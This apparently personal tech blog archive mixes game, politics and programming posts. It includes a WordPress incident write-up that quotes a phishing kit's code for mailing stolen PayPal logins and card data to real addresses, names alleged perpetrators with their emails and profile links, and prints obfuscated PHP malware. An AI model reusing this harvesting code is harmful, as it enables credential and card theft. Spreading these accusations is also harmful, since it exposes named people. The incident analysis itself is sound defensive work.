diablo 3 monk gold farming tactic

June 2, 2012

Despite some previous objections, I have still been playing Diablo 3, more than I’d actually care to admit. After my first legendary drop sold for 2.85 million, I decided to use the fortune to invest in some gold find gear. I have been running Act 4 normal mode, and it usually takes about 40 minutes to complete, and nets around 55,000g. Here are the basics:

My Stats

91% gold find
49 yards pickup radius
8,500 dmg
3400 armor
23.5k life
2 x ~850 DPS weapons

Key Talents

Mystic Ally -> Air Ally (This allows the ally to break barrels, vases, etc. More gold!)
Mantra of Conviction -> Submission (Does 17% dmg to enemies within 20 yards, every second – or: about 800 damage with my current gear)
Fleet Footed & Chant of Resonance (Movement speed and extra duration on your mantras, respectively)

With these stats and the four key talents listed above, I can run through (literally, just running) Act 4 of Normal difficulty and never have to swing a weapon. I just collect gold. If you’re running this setup, I’d like to know your stats and other places to farm.

diablo 3 – DRM or not?

May 23, 2012

The more I think about the online-only requirement of Diablo 3, the more I realize that I don’t actually own the game. I’m basically leasing it from Blizzard. Shouldn’t I own software that I purchase, and by extension of that ownership, do as I please with it?

obama, china and cisco walk into a bar

May 9, 2012

On Monday April 23rd, “President Barack Obama announced Monday that he has signed an executive order allowing new sanctions against companies that enable Syria and Iran to use technology such as cell phone monitoring to carry out human rights abuses.”1

The hypocrisy here is astounding. American companies are (and have been) selling software and hardware to oppressive governments in record numbers. Reporters Without Borders has a list accurately titled, “Enemies of the internet” that is updated annually. Currently on that list:

Current suspected exporters of censorship hardware and software:
  • Nokia Siemens Networks
  • Ericsson
  • Secure Computing, recently acquired by Intel
  • Narus
  • Cisco
Additional reading:
It may make for convenient election-year postulating, but don’t be fooled – the current administration (or any before it, for that matter. Does NSA warrantless wiretapping ring any bells?) are quite happy overlooking human rights abuses in countries not currently in the media spotlight.

1 http://www.cnn.com/2012/04/23/politics/obama-human-rights/index.html

general miscellaneous update

May 8, 2012

I feel like I should post something, so here are a couple projects I’m working on.

 

LiiMS – Laboratory information management system built on Yii framework. Still in very early infancy.

Five Families: The Yellow Pages – I’ve been screwing around with The Godfather: Five Families on G+ lately and am releasing a program later that will allow players to find any other player on their server (As opposed to sifting through a 750×750 grid to find them). That will probably be posted on the site within a few weeks’ time.

first odesk job – wordpress hacked! update: comfort suites dickery

July 24, 2011

I love these freelance gigs! This client’s WordPress blog had been hacked multiple times, and despite reverting to numerous backups, the website always seemed to have phishing pages placed on it. There are a number of ways to go about fixing hacked websites, but if you don’t take care of the source of the problem, it’s just going to keep happening.

This particular phishing page was for PayPal France and was set up to capture personal information (For PayPal and otherwise) and credit card data and email it off to the perpetrators. Here’s the relevant code:

$subj = "Paypal [FR] Result | $paye | $ip"; // Subject
 
$msg = "+-----------------------[Dark-M - PayPal [FR] Result's]-----------------+\n +-----------------------------------------------------+ \n
Prenom : $pnom\n Nom: $nom\n +-----------------------------------------------------+\n Email: $email\n Password: $passw\n Question secret 1: $answer1\n
 Question secret 2: $answer2\n +-----------------------------------------------------+\n ligne d'adresse 1: $adress1\n ligne d'adresse 2: $adress2\n
 ville: $ville\n zip code: $zip\n Pays: $paye\n Telephone: $phone\n Date de naissance: $dob_b - $dob_a - $dob_c\n
+---------------------+ PayPal info +-------------------+\n type de carte : $credit_card\n numero de carte : $cc\n
Date d'expiration: $expdate_m / $expdate_y\n Cvv: $cvv\n Compte Bancaire: $cmpt_b\n Code d'Authentification : $codepe\n
 +--------------------------|Dark-M|---------------------------+\n IP Address : $ip\n"; // Do not modify
 
$to = "attioui.m@facebook.com,k5h@hotmail.fr,result@live.de,amarevisa@gmail.com" ; // Write your email

Clearly not the smartest people on Earth. That Facebook email belongs to this guy:  http://www.facebook.com/attioui.m and he looks like the kind of asshole that would leave his Facebook email as evidence of phishing.

In any case, once the phishing page was updated with a warning (and disabled), it was time to get things back in order. In this case, there were a number of plugins installed including All In One SEO Pack, which I believe is the culprit. I haven’t had time to properly audit the application, but there are a number of reports from other bloggers about their sites being hacked and running this plugin.

If you find yourself with a recurring hacked WordPress installation, do the following in this order:

  1. Change all passwords immediately.
  2. Disable and delete all plugins immediately.
  3. Hire someone that knows enough about WordPress and web application security to check the plugins you decided to install.

Plugins really are great, but it seems like they attract the lowest common denominator programmers. You have no idea who these people are, what their expertise is like and what the history of the plugin is. The plugin could have been made solely for the purpose of executing a shell under the correct conditions.

If you are a non-technical blogger that needs a solution, seriously consider getting yourself a professional. When someone installs poorly written plugins, they are exposing themselves and everyone else on that server to being hacked, defrauded and potentially embarrassed. It’s worth the time and money to do things the right way.
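A static triage pass for dropped pages like the one above, as an added example (not code from the original post or the client's site): it flags PHP files that combine a mail() call, at least two credential or card variables, and a hard-coded address. The function names, the three-indicator threshold and the sample files are assumptions constructed for illustration; the excerpt above does not show the kit's send call, so mail() is assumed from the description.

```python
import os
import re
import tempfile

# Heuristics taken from the kit quoted above: credential/card variables are
# interpolated into a message that is mailed to hard-coded addresses.
MAIL_CALL = re.compile(r"\bmail\s*\(", re.I)
SENSITIVE = re.compile(
    r"\$(passw(?:or)?d?|cvv2?|cc|credit_card|expdate_\w+|answer\d*)\b", re.I)
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

def triage_php(source):
    """Score one PHP source string; 3 means all three indicators are present."""
    fields = sorted({f.lower() for f in SENSITIVE.findall(source)})
    recipients = sorted(set(EMAIL.findall(source)))
    score = (bool(MAIL_CALL.search(source)) + (len(fields) >= 2)
             + bool(recipients))
    return score, fields, recipients

def scan_tree(root, threshold=3):
    """Walk a web root and return (relative path, fields, recipients) hits."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, fields, rcpts = triage_php(fh.read())
            if score >= threshold:
                findings.append((os.path.relpath(path, root), fields, rcpts))
    return sorted(findings)

# Constructed samples (not from the incident): a mailer shaped like the kit
# and an ordinary contact form that must not be flagged.
KIT = ('<?php $msg = "Email: $email\\n Password: $passw\\n Cvv: $cvv\\n";\n'
       '$to = "drop1@example.com,drop2@example.net";\n'
       'mail($to, $subj, $msg); ?>')
CONTACT = '<?php $to = "owner@example.org"; mail($to, "Contact", $body); ?>'

def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, src in (("wp-content/uploads/fr/result.php", KIT),
                         ("wp-content/plugins/form/contact.php", CONTACT)):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(src)
        return scan_tree(root)
```

Hits are leads for manual review, and a clean scan does not replace finding the entry point that let the page be dropped.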

Mohamed Attioui


Update: After confronting the Facebook guy on Monday morning of July 25th about his involvement, he immediately changed his name to “Simo Attioui” and then blocked me from viewing his profile or messaging him. k5h@hotmail.fr also appears to be “Dark-M”, the person who wrote the page for gathering information. Here are a couple pages belonging to him: http://hidden-team.com/fourm/member.php?u=21 && http://www.dark-m.fr/

Update II: Monday afternoon (July 25), after having my debit card declined at lunch, I called my bank to find out why, despite having more than enough funds, I wasn’t able to pay for lunch. Apparently on July 21st, some random dickhead decided to use my stolen credit card at a Comfort Suites in Wisconsin. They only charged slightly over $8, and I disputed it and got my money back, but there were also 2 other attempts at purchasing something, which thankfully were both denied. What exactly can you buy at a Comfort Suites that costs $8? My guess is the person was attempting to make sure the card had a balance before going on a big shopping spree. Nobody really seems too concerned about this either, so I reckon I’ll do some investigating myself this week.

php malware

July 20, 2011

Last month someone passed me a php engine (malware? blackhat seo?) of sorts that I have been dissecting at home. It is strangely similar to another one I found last year on a client website. Here are a few sections worth mentioning.

ob_start((isset($_0) ? 'A' . strtoupper(md5('rx_output')) : 'rx_output'));

function variable70()
  {
      global $_0, $_1, $_2, $_3;
      global ${ '_SERVER' };
      function25('HTTP/1.1 404 Not Found', true);
      echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.<P><P>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.<HR><ADDRESS>' . $_SERVER['SERVER_SIGNATURE'] . '</ADDRESS></BODY></HTML>';
      exit;
  }

I’m leaning towards malware, and here’s why: http://www.download-review.com/shop/search/?s=windows+7

work project

July 15, 2011

We had a work project come through this week, where the client needed some files parsed and their usual programmer is MIA. They sent us a number of data samples, and the MSSQL that the previous programmer used. Since we don’t operate with MSSQL, I took the old SQL and decided to write a few stored procedures; something I hadn’t done before. After an hour or two, I came up with this:

TRUNCATE TABLE tblReadDataWrk2
INSERT INTO tblReadDataWrk2
           ([ReadDateTime]
           ,[SiteID]
           ,[TagID]
           ,[ReadSeq]
           ,[ReaderID]
           ,[ReadStrength]
           ,[Motion])
SELECT [ReadDateTime]
      ,[SiteID]
      ,[TagID]
      ,[ReadSeq]
      ,[ReaderID]
      ,[ReadStrength]
      ,[Motion]
  FROM [AcuteTrack].[dbo].[tblReadDataWrk]
 
 
DECLARE @RowCnt INT
DECLARE @MaxRows INT
DECLARE @currentReadSeq INT
DECLARE @currentReadStrength SMALLINT
 
 
SELECT @RowCnt = 1
 
-- These next two rows are specific to source table or query
DECLARE @tblTempRead TABLE (rownum INT IDENTITY (1, 1) PRIMARY KEY NOT NULL , 
        ReadSeq INT,
        ReadStrength SMALLINT)
INSERT INTO @tblTempRead (ReadSeq, ReadStrength) SELECT ReadSeq, ReadStrength FROM tblReadDataWrk2
 
SELECT @MaxRows=COUNT(*) FROM @tblTempRead
 
while @RowCnt <= @MaxRows
BEGIN
 
    SELECT @currentReadSeq = ReadSeq, @currentReadStrength = ReadStrength FROM @tblTempRead WHERE rownum = @RowCnt
 
    IF EXISTS ( SELECT readseq FROM tblReadDataWrkNurse WHERE ( readseq > @currentReadSeq - 3 AND 
               readseq < @currentReadSeq + 3 ) AND ReadStrength >= @currentReadStrength )
               DELETE tblReadDataWrk2 WHERE readseq = @currentReadSeq 
 
    SELECT @RowCnt = @RowCnt + 1
END

Turned into:

DROP PROCEDURE IF EXISTS step8;
DELIMITER //
CREATE PROCEDURE step8()
BEGIN
	SET @RowCnt = 1;
	SET @MaxRows = 0;
	SET @currentReadSeq = 0;
	SET @currentReadStrength = 0;
 
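	-- Drop any leftover copy so the procedure can be called more than once per session
	DROP TEMPORARY TABLE IF EXISTS tblTempRead;
	CREATE TEMPORARY TABLE tblTempRead (rownum INT(11) NOT NULL AUTO_INCREMENT PRIMARY KEY, ReadSeq INT(11), ReadStrength SMALLINT);
	INSERT INTO tblTempRead (ReadSeq, ReadStrength) SELECT ReadSeq, ReadStrength FROM tblReadDataWrk2;
	select @MaxRows:=count(*) from tblTempRead;
 
	while @RowCnt <= @MaxRows do
 
		-- Table names are case-sensitive on most Linux installs, so use the declared spelling
		select @currentReadSeq:=ReadSeq, @currentReadStrength:=ReadStrength FROM tblTempRead WHERE rownum = @RowCnt;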
 
    		IF EXISTS ( SELECT ReadSeq FROM tblReadDataWrkNurse WHERE ( ReadSeq > @currentReadSeq - 3 AND ReadSeq < @currentReadSeq + 3 ) AND ReadStrength >= @currentReadStrength ) THEN
               		delete from tblReadDataWrk2 where ReadSeq = @currentReadSeq;
    		END IF;
 
    		SET @RowCnt = @RowCnt + 1;
	end while;
END//
DELIMITER ;
CALL step8();

There is one more step left; the MSSQL is about twice as large as this one. I may post it when I’m finished if it still feels like an accomplishment. I’m happy with how my first stored procedure turned out, but is there a better way?

mysql modified preorder tree traversal

July 13, 2011

<?php
/*
CREATE TABLE IF NOT EXISTS `categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `name` varchar(255) NOT NULL,
  `l` int(11) NOT NULL,
  `r` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20 ;
 
--
-- Dumping data for table `categories`
--
 
INSERT INTO `categories` (`id`, `parent_id`, `name`, `l`, `r`) VALUES
(1, 0, 'Shop Public', 1, 38),
(2, 1, 'For Sale', 2, 35),
(3, 2, 'For Sale', 3, 14),
(4, 3, 'Appliances', 4, 5),
(5, 3, 'Barter', 6, 7),
(6, 3, 'Bikes', 8, 9),
(7, 3, 'Boats', 10, 11),
(8, 3, 'Books', 12, 13),
(9, 2, 'Real Estate', 15, 22),
(10, 2, 'Vehicles', 23, 34),
(11, 1, 'Community', 36, 37),
(12, 9, 'Single Family', 16, 17),
(13, 9, 'Condo', 18, 19),
(14, 9, 'Apartment', 20, 21),
(15, 10, 'Convertible', 24, 25),
(16, 10, 'Coupe', 26, 27),
(17, 10, 'SUV', 28, 29),
(18, 10, 'Truck', 30, 31),
(19, 10, 'Wagon', 32, 33);
*/
 
include('includes.php');
 
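// Recompute the l/r (left/right) values for the subtree rooted at $parent.
// $left is the left value to give $parent; the return value is the next free number.
function rebuild_tree($parent, $left) 
{
	// Cast once so only integers are ever concatenated into the SQL below
	$parent = (int) $parent;
	$left = (int) $left;

	// The right value of a node without children is its left value + 1
	$right = $left + 1;
 
	$result = mysql_query('SELECT parent_id, id FROM categories WHERE parent_id = "'.$parent.'";'); 
	while ($row = mysql_fetch_array($result)) 
	{
		// Each child consumes the numbers it needs and hands back the next free one
		$right = rebuild_tree($row['id'], $right);
	}
 
	// All children are numbered, so $right is now this node's right value
	mysql_query('UPDATE categories SET l = '.$left.', r = '.$right.' WHERE id = "'.$parent.'";');
 
	return $right+1;
}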
 
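// Print the subtree rooted at $root, one node per line, indented by depth.
function display_tree($root) 
{
	// Cast so only an integer is concatenated into the SQL below
	$root = (int) $root;

	$result = mysql_query('SELECT l, r FROM categories WHERE id = "'.$root.'";');
	$row = mysql_fetch_array($result);
 
	// Stack of right values of the ancestors of the current node
	$right = array();
 
	// Every descendant has an l value between the root's l and r
	$result = mysql_query('SELECT name, l, r, id FROM categories WHERE l BETWEEN '.$row['l'].' AND '.$row['r'].' ORDER BY l ASC;');
	while ($row = mysql_fetch_array($result)) 
	{
		if (count($right)>0) 
		{
			// Pop ancestors whose range ended before this node
			while ($right[count($right)-1] < $row['r']) 
			{
				array_pop($right);
			}
		}
 
		// Stack depth is the node's depth below $root
		echo str_repeat('-',count($right)).$row['name']."<br />";
 
		$right[] = $row['r'];
	}
}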
 
rebuild_tree(1, 1);
display_tree(3);
?>

acibind && System_Daemon PEAR class

July 12, 2011


At “Real Work”, we have a nifty ongoing project that requires the use of RFID hardware. (Supplied via RF Code - http://www.rfcode.com/) The project tracks movements of personnel through small hospitals, and then sends that data to a central location. We needed something that could a) Run continuously b) Start & stop gracefully and c) interface with the rest of the system. I had my heart set on a cron job, but after messing with that over the course of a half-day, it became obvious that it wasn’t what we needed. The answer for this project was in a little PEAR class called System_Daemon (http://kevin.vanzonneveld.net/techblog/article/create_daemons_in_php/ - Find the code & examples here).

System_Daemon is fast, light-weight and does everything the daemon needs to do with ease. Every hospital where the hardware is installed connects to this single server, and there is a backend that was built to build reports of movement and time spent in locations. Unfortunately I can’t share acibind (Yes, I named my pet daemon) or the reporting mechanisms, but if you look at Kevin’s homepage you’ll get a basic idea of how it all comes together.

Compared to the old tracking equipment and reporting (Which used RFID signal strength as opposed to infra-red), the new system is about 200% more accurate in tracking assets and reporting, which saves these hospitals a lot of money every year. Looking forward to installing the equipment in more locations around the country and seeing the project grow.